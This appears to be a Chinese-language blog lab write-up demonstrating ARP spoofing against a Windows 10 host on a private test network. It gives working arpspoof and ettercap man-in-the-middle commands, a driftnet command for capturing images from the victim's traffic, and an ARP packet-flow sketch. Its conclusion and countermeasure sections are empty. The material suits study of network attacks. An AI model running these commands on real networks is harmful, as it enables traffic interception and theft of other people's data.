首页投稿(暂停使用,暂停投稿)程序员网络安全实验室

ARP spoofing 实验与分析

2016-07-07  本文已影响562人  Iam老J

定义

ARP spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Generally, the aim is to associate the attacker's MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead.` (By wiki)

拆分如下几个概念:

场景测试

拓扑

topo4kali_penetration.png

涉及工具

目的

利用 arpspoof or ettercap对LAN中的Windows host(Win10)进行 ARP spoofing 攻击。

  1. 在攻击host开启 ip_fowoard,默认关闭。如不开启,可以导致断网攻击。
  2. 运行arpspoof 
## Bi-direction arp spoofing, or cause DOS due to only half traffic being redirected to attacker 
## How to use arpspoof
arpspoof -i <interface> -t <target> <default gateway>
arpspoof -i <interface> -t <default gateway> <target>

## Actual commands run
## Gateway's IP 192.168.168.1
## Victim's IP  192.168.168.101
arpspoof -i eth0 192.168.168.101 192.168.168.1
arpspoof -i eth0 192.168.168.1 192.168.168.101
  1. 利用 driftnet抓取窃取流量汇总的图片(也可以是音频)
## Capture images from network traffic and display them in an X window.
driftnet -i  eth0 -m 200 -a - d ~/Pictures    
-i interface
-m maximum picture number to store
-a no print on x-window and just store
-d directory
  1. (可选)工具 ettercap 替代arpspoof 
ettercap -i eth0 -Tq -M arp:remote //192.168.168.101// //192.168.168.1//
参数说明:
-i: 网卡
-T :文本模式(-G 图形界面)
-q:安静模式,仅当嗅探到密码时才显示
-M:攻击方法
-P:加载插件,比如sslstrip

抓包分析

Sniffer (192.168.168.104)-- Win host (192.168.168.101)
------> who is at 101 (request)
<------ win's mac is at 101 (reply)
------> who is at 1 (request)
<------ gw's mac is at 1 (reply)
arpspoof starts
------> gw(Sniffer's mac) is at 1 (reply) ## cheat Win host
------> win(Sniffer's mac) is at 104 (reply) ## cheat Gateway
... repeat above two actions periodically

结论

应对

上一篇 下一篇

猜你喜欢

热点阅读